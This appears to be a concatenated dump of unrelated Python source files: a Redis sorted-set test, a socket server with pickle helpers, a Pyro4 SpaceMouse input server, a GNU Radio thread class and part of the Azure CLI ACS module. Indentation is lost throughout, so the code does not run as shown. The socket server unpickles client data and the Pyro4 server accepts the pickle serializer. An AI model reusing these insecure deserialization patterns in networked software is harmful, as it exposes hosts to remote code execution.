p, s = await rss.peak_max()
assert p.name == 'spinach' and s == p.nutrition
await rss.increment((p, 10))
p, s = await rss.peak_max()
assert p.name == 'spinach' and s == (p.nutrition + 10)
ctx.run(main()).result()
def test_models_slices(ctx):
class Plant(BaseModel):
name: str
nutrition: float
tasty: bool = False
def __hash__(self):
return hash(self.json())
plants = [
Plant(name="apples", nutrition=5, tasty=True),
Plant(name="bananas", nutrition=3, tasty=True),
Plant(name="spinach", nutrition=9, tasty=False),
Plant(name="tomatoes", nutrition=8, tasty=False),
Plant(name="carrots", nutrition=7, tasty=False),
Plant(name="lettuce", nutrition=4, tasty=False),
Plant(name="mangoes", nutrition=6, tasty=True)
]
key = "trash:models"
rss = RedisSortedSet(ctx.rc, key, Plant)
async def main():
await rss.clear()
await rss.add([(p, p.nutrition) for p in plants])
res = await rss.slice_by_score(min_score=7, max_score=20, descending=True)
for p, k in zip([r[0] for r in res], ['spinach', 'tomatoes', 'carrots']):
assert p.name == k
res = await rss.slice_by_score(min_score=7, max_score=20, descending=False)
for p, k in zip([r[0] for r in res], ['carrots', 'tomatoes', 'spinach']):
assert p.name == k
res = await rss.slice_by_rank(min_rank=0, max_rank=1, descending=True) # top 2
assert len(res) == 2
for p, k in zip([r[0] for r in res], ['spinach', 'tomatoes']):
assert p.name == k
res = await rss.slice_by_rank(min_rank=0, max_rank=1, descending=False) # bottom 2
assert len(res) == 2
for p, k in zip([r[0] for r in res], ['bananas', 'lettuce']):
assert p.name == k
ctx.run(main())
|
server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from logging.handlers import RotatingFileHandler
import pickle
import socket
import threading
class ThreadedServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target = self.listenToClient,args = (client,address)).start()
def listenToClient(self, client, address):
size = 1024
global logger
while True:
try:
data = client.recv(size)
if data:
#Received data
logger.debug("Received data from client")
else:
raise Exception(logger.error("Client disconnected"))
except:
client.close()
return False
def unpickle_data(tdata):
"""
Unpickle the data from the client
>>> unpickle_data(b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.')
"Easy tests"
>>> unpickle_data("Easy tests")
"Easy tests"
"""
try:
if isinstance(tdata, bytes): #Quick check if tdata is already bytes
data = pickle.loads(tdata)
else:
data = tdata
except:
data = False
return data
def pickle_data(tdata):
"""
Pickle the data for the client
>>> pickle_data(b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.')
b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.'
>>> pickle_data("Easy tests")
b'\x80\x03X\n\x00\x00\x00Easy testsq\x00.'
"""
try:
if isinstance(tdata, bytes): #Quick check if tdata is already bytes
data = tdata
else:
data = pickle.dumps(tdata)
except:
data = False
return data
###Starting the logger###
try:
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')
file_handler = RotatingFileHandler('activity.log', 'a', 1000000, 1)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
except:
print("!!! Failed to launch logger !!!")
print("!!! Immediate shutdown !!!")
exit()
###End of logger starting###
logger.info("Server starting...")
|
input_server.py
|
# first to start the nameserver start: python -m Pyro4.naming
import Pyro4
from threading import Thread
import time
import numpy as np
from rlkit.launchers import conf as config
Pyro4.config.SERIALIZERS_ACCEPTED = set(['pickle','json', 'marshal', 'serpent'])
Pyro4.config.SERIALIZER='pickle'
device_state = None
@Pyro4.expose
class DeviceState(object):
state = None
def get_state(self):
return device_state
def set_state(self, state):
global device_state
device_state = state
class SpaceMouseExpert:
def __init__(
self,
xyz_dims=3,
xyz_remap=[0, 1, 2],
xyz_scale=[1, 1, 1],
xyz_abs_threshold=0.0,
rot_dims=3,
rot_remap=[0, 1, 2],
rot_scale=[1, 1, 1],
rot_abs_threshold=0.0,
rot_discrete=False,
min_clip=-np.inf,
max_clip=np.inf
):
"""TODO: fill in other params"""
self.xyz_dims = xyz_dims
self.xyz_remap = np.array(xyz_remap)
self.xyz_scale = np.array(xyz_scale)
self.xyz_abs_threshold = xyz_abs_threshold
self.rot_dims = rot_dims
self.rot_remap = rot_remap
self.rot_scale = rot_scale
self.rot_abs_threshold = rot_abs_threshold
self.rot_discrete = rot_discrete
self.min_clip = min_clip
self.max_clip = max_clip
self.thread = Thread(target = start_server)
self.thread.daemon = True
self.thread.start()
self.device_state = DeviceState()
def get_action(self, obs):
"""Must return (action, valid, reset, accept)"""
state = self.device_state.get_state()
# time.sleep(0.1)
if state is None:
return None, False, False, False
dpos, rotation, roll, pitch, yaw, accept, reset = (
state["dpos"],
state["rotation"],
state["roll"],
state["pitch"],
state["yaw"],
state["grasp"], #["left_click"],
state["reset"], #["right_click"],
)
xyz = dpos[self.xyz_remap]
xyz[np.abs(xyz) < self.xyz_abs_threshold] = 0.0
xyz = xyz * self.xyz_scale
xyz = np.clip(xyz, self.min_clip, self.max_clip)
rot = np.array([roll, pitch, yaw])
rot[np.abs(rot) < self.rot_abs_threshold] = 0.0
if self.rot_discrete:
max_i = np.argmax(np.abs(rot))
for i in range(len(rot)):
if i != max_i:
rot[i] = 0.0
rot = rot * self.rot_scale
rot = np.clip(rot, self.min_clip, self.max_clip)
a = np.concatenate([xyz[:self.xyz_dims], rot[:self.rot_dims]])
valid = not np.all(np.isclose(a, 0))
# print(a, roll, pitch, yaw, valid)
return (a, valid, reset, accept)
def start_server():
daemon = Pyro4.Daemon(config.SPACEMOUSE_HOSTNAME)
ns = Pyro4.locateNS() # find the name server
uri = daemon.register(DeviceState) # register the greeting maker as a Pyro object
ns.register("example.greeting", uri) # register the object with a name in the name server
print("uri:", uri)
print("Server ready.")
daemon.requestLoop() # start the event loop of the server to wait for calls
if __name__ == "__main__":
expert = SpaceMouseExpert()
for i in range(100):
time.sleep(1)
print(expert.get_action(None))
|
AbstractBaseThread.py
|
import os
import socket
import sys
import tempfile
from queue import Queue, Empty
from subprocess import Popen, PIPE
from threading import Thread
import time
import zmq
from PyQt5.QtCore import QThread, pyqtSignal
from urh import constants
from urh.util.Logger import logger
ON_POSIX = 'posix' in sys.builtin_module_names
class AbstractBaseThread(QThread):
started = pyqtSignal()
stopped = pyqtSignal()
sender_needs_restart = pyqtSignal()
def __init__(self, sample_rate, freq, gain, bandwidth, receiving: bool,
ip='127.0.0.1', parent=None):
super().__init__(parent)
self.ip = ip
self.port = 1337
self._sample_rate = sample_rate
self._freq = freq
self._gain = gain
self._bandwidth = bandwidth
self._receiving = receiving # False for Sender-Thread
self.usrp_ip = "192.168.10.2"
self.device = "USRP"
self.current_index = 0
self.context = None
self.socket = None
if constants.SETTINGS.value("use_gnuradio_install_dir", False, bool):
gnuradio_dir = constants.SETTINGS.value("gnuradio_install_dir", "")
with open(os.path.join(tempfile.gettempdir(), "gnuradio_path.txt"), "w") as f:
f.write(gnuradio_dir)
self.python2_interpreter = os.path.join(gnuradio_dir, "gr-python27", "python.exe")
else:
self.python2_interpreter = constants.SETTINGS.value("python2_exe", "")
self.queue = Queue()
self.data = None # Placeholder for SenderThread
self.current_iteration = 0 # Counts number of Sendings in SenderThread
self.tb_process = None
@property
def sample_rate(self):
return self._sample_rate
@sample_rate.setter
def sample_rate(self, value):
self._sample_rate = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'SR:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
@property
def freq(self):
return self._freq
@freq.setter
def freq(self, value):
self._freq = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'F:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
@property
def gain(self):
return self._gain
@gain.setter
def gain(self, value):
self._gain = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'G:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
@property
def bandwidth(self):
return self._bandwidth
@bandwidth.setter
def bandwidth(self, value):
self._bandwidth = value
if self.tb_process:
try:
self.tb_process.stdin.write(b'BW:' + bytes(str(value), "utf8") + b'\n')
self.tb_process.stdin.flush()
except BrokenPipeError:
pass
def initalize_process(self):
self.started.emit()
if not hasattr(sys, 'frozen'):
rp = os.path.dirname(os.path.realpath(__file__))
else:
rp = os.path.join(os.path.dirname(sys.executable), "dev", "gr")
rp = os.path.realpath(os.path.join(rp, "scripts"))
suffix = "_recv.py" if self._receiving else "_send.py"
filename = self.device.lower() + suffix
if not self.python2_interpreter:
raise Exception("Could not find python 2 interpreter. Make sure you have a running gnuradio installation.")
options = [self.python2_interpreter, os.path.join(rp, filename),
"--samplerate", str(self.sample_rate), "--freq", str(self.freq),
"--gain", str(self.gain), "--bandwidth", str(self.bandwidth),
"--port", str(self.port)]
if self.device.upper() == "USRP":
options.extend(["--ip", self.usrp_ip])
logger.info("Starting Gnuradio")
self.tb_process = Popen(options, stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=1)
logger.info("Started Gnuradio")
t = Thread(target=self.enqueue_output, args=(self.tb_process.stderr, self.queue))
t.daemon = True # thread dies with the program
t.start()
def init_recv_socket(self):
logger.info("Initalizing receive socket")
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PULL)
logger.info("Initalized receive socket")
while not self.isInterruptionRequested():
try:
time.sleep(0.1)
logger.info("Trying to get a connection to gnuradio...")
self.socket.connect("tcp://{0}:{1}".format(self.ip, self.port))
logger.info("Got connection")
break
except (ConnectionRefusedError, ConnectionResetError):
continue
except Exception as e:
logger.error("Unexpected error", str(e))
def run(self):
pass
def read_errors(self):
result = []
while True:
try:
result.append(self.queue.get_nowait())
except Empty:
break
result = b"".join(result)
return result.decode("utf-8")
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def stop(self, msg: str):
if msg and not msg.startswith("FIN"):
self.requestInterruption()
if self.tb_process:
logger.info("Kill grc process")
self.tb_process.kill()
logger.info("Term grc process")
self.tb_process.terminate()
self.tb_process = None
logger.info(msg)
self.stopped.emit()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
import requests
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.command_modules.role.custom import _resolve_service_principal
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.graphrbac.models import (ApplicationCreateParameters,
GraphErrorException,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile
from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.models import ManagedCluster
from azure.mgmt.containerservice.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.models import ManagedClusterAgentPoolProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file)
elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
else:
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
return
def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
elif orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
else:
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
if client_version == 'latest':
context = _ssl_context()
version = urlopen('https://storage.googleapis.com/kubernetes-release/release/stable.txt',
context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = 'https://storage.googleapis.com/kubernetes-release/release/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location upon the ACI avaiable regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = _get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _get_subscription_id(cli_ctx):
_, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None)
return sub_id
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
